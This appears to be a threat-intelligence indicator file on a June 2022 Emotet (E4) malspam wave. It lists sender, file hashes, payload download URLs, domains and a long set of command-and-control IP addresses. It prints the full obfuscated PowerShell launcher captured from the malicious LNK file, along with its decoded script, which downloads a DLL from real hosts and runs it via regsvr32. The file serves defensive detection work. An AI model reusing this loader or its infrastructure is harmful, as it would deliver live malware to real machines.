/
2022-06-14 Emotet (E4) #2 IOCs
116 lines (101 loc) · 4.16 KB
/
2022-06-14 Emotet (E4) #2 IOCs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
THREAT IDENTIFICATION: EMOTET (E4)
SUBJECTS OBSERVED
Subject was from a previously stolen email thread.
SENDERS OBSERVED
sales@shiode.co.jp
ZIP FILE HASHES
Report - 2022-06-14_1146 Gmail.zip
ddf7fffd6c124f8fabd70153ce6362e6
LNK FILE HASHES
Report - 2022-06-14_1146.lnk
0a808ba146e8bd723dd87441ae473354
POWERSHELL CAPTURED DURING LNK FILE EXECUTION
powershell.exe [600]
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "&{'XWP/JUioHBbmF1/daOqX3ZLIuxOfBKijbBATwbDCqROkGOhOZIpGTr/EErkWy+dbdxAhTEPz';$PdTOA='Vzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tdWxtYXRkb2wuY29tL2FkbS9sZzQ2V09RR0NxMzdRZWRhay8iLCJodHRwOi8vd3d3LmJhbGNhb2Rhc21hcmNhcy5jb20vd3AtY29udGVudC9YNXBsT2Y1bGNSaERNZnp5My8iLCJodHRwOi8vd3d3LmZ1bmRhY2lvbmNlZGVzLm9yZy9faW5zdGFsbGF0aW9uL3ZqZ2xrNkVDSS8iLCJodHRwOi8vd3d3LmF3YW0uYmUvbW9pL3NlWXRFUVBBVy8iLCJodHRwczovL3dpanNuZXVzbWVkaWEubmwvY2dpLWJpbi94Tk1yVnVreWpxMmttZE8vIiwiaHR0cHM6Ly96ZW5wcm9kLmNvbS9pbV9lZGl0LzJ3LyIpOyR0PSJvT1dJVWFXYWkiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcQlpRZ2JuRVpZRi5PTmo7UmVnc3ZyMzIuZXhlICIkZFxCWlFnYm5FWllGLk9OaiI7YnJlYWt9IGNhdGNoIHsgfX0=';$GomygB='ICAgICAgV3JpdGUtSG9zdCAicXRUalUiOyRQcm9ncm';$GomygB=$GomygB+$PdTOA;$hcWLw=$GomygB;$Ag=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($hcWLw));$hcWLw=$Ag;iex($hcWLw)}"
BASE64 BLOB DECODES TO:
Write-Host "qtTjU";$ProgressPreference="SilentlyContinue";$links=("http://mulmatdol.com/adm/lg46WOQGCq37Qedak/","http://www.balcaodasmarcas.com/wp-content/X5plOf5lcRhDMfzy3/","http://www.fundacioncedes.org/_installation/vjglk6ECI/","http://www.awam.be/moi/seYtEQPAW/","https://wijsneusmedia.nl/cgi-bin/xNMrVukyjq2kmdO/","https://zenprod.com/im_edit/2w/");$t="oOWIUaWai";$d="$env:TMP\..\$t";mkdir -force $d | out-null;foreach ($u in $links) {try {IWR $u -OutFile $d\BZQgbnEZYF.ONj;Regsvr32.exe "$d\BZQgbnEZYF.ONj";break} catch { }}
EMOTET PAYLOAD DOWNLOAD URLS
http://mulmatdol.com/adm/lg46WOQGCq37Qedak/
http://www.balcaodasmarcas.com/wp-content/X5plOf5lcRhDMfzy3/
http://www.fundacioncedes.org/_installation/vjglk6ECI/
http://www.awam.be/moi/seYtEQPAW/
https://wijsneusmedia.nl/cgi-bin/xNMrVukyjq2kmdO/
https://zenprod.com/im_edit/2w/
EMOTET PAYLOAD DOWNLOAD DOMAINS
awam.be
balcaodasmarcas.com
fundacioncedes.org
mulmatdol.com
wijsneusmedia.nl
zenprod.com
EMOTET PAYLOAD FILE HASHES
1c6ba04dc9808084846ac1005deb9c85
b1abebca8a365e960f8c7470c7308be1
c69af841e6ba7cbfd68715c1d3dd23a4
d434e7c85603678eafeea9fa2b6c477f
e1997362dd966e3a5efd93d273f49b2c
e2af37ce8154d8326658d698bf317570
EMOTET C2s
http://144.91.78.55:443
http://172.105.226.75:8080
http://51.161.73.194:443
http://45.186.16.18:443
http://41.73.252.195:443
http://172.104.251.154:8080
http://45.176.232.124:443
http://103.75.201.2:443
http://197.242.150.244:8080
http://173.212.193.249:8080
http://212.24.98.99:8080
http://51.254.140.238:7080
http://1.234.2.232:8080
http://183.111.227.137:8080
http://103.132.242.26:8080
http://82.165.152.127:8080
http://107.170.39.149:8080
http://46.55.222.11:443
http://153.126.146.25:7080
http://134.122.66.193:8080
http://151.106.112.196:8080
http://163.44.196.120:8080
http://164.68.99.3:8080
http://213.241.20.155:443
http://45.118.115.99:8080
http://101.50.0.91:8080
http://167.172.253.162:8080
http://207.148.79.14:8080
http://129.232.188.93:443
http://185.4.135.165:8080
http://1.234.21.73:7080
http://150.95.66.124:8080
http://149.56.131.28:8080
http://115.68.227.76:8080
http://201.94.166.162:443
http://196.218.30.83:443
http://103.70.28.102:8080
http://91.207.28.33:8080
http://209.97.163.214:443
http://206.189.28.199:8080
http://64.227.100.222:8080
http://188.44.20.25:443
http://159.65.140.115:443
http://51.91.76.89:8080
http://186.194.240.217:443
http://45.235.8.30:8080
http://103.43.75.120:443
http://79.137.35.198:8080
http://82.223.21.224:8080
http://160.16.142.56:8080
http://158.69.222.101:443
http://5.9.116.246:8080
http://94.23.45.86:4143
http://203.114.109.124:443
http://159.65.88.10:8080
http://146.59.226.45:443
http://209.126.98.206:8080
http://119.193.124.41:7080
http://110.232.117.186:8080
http://37.187.115.122:8080
http://72.15.201.15:8080
http://131.100.24.231:80
http://159.89.202.34:443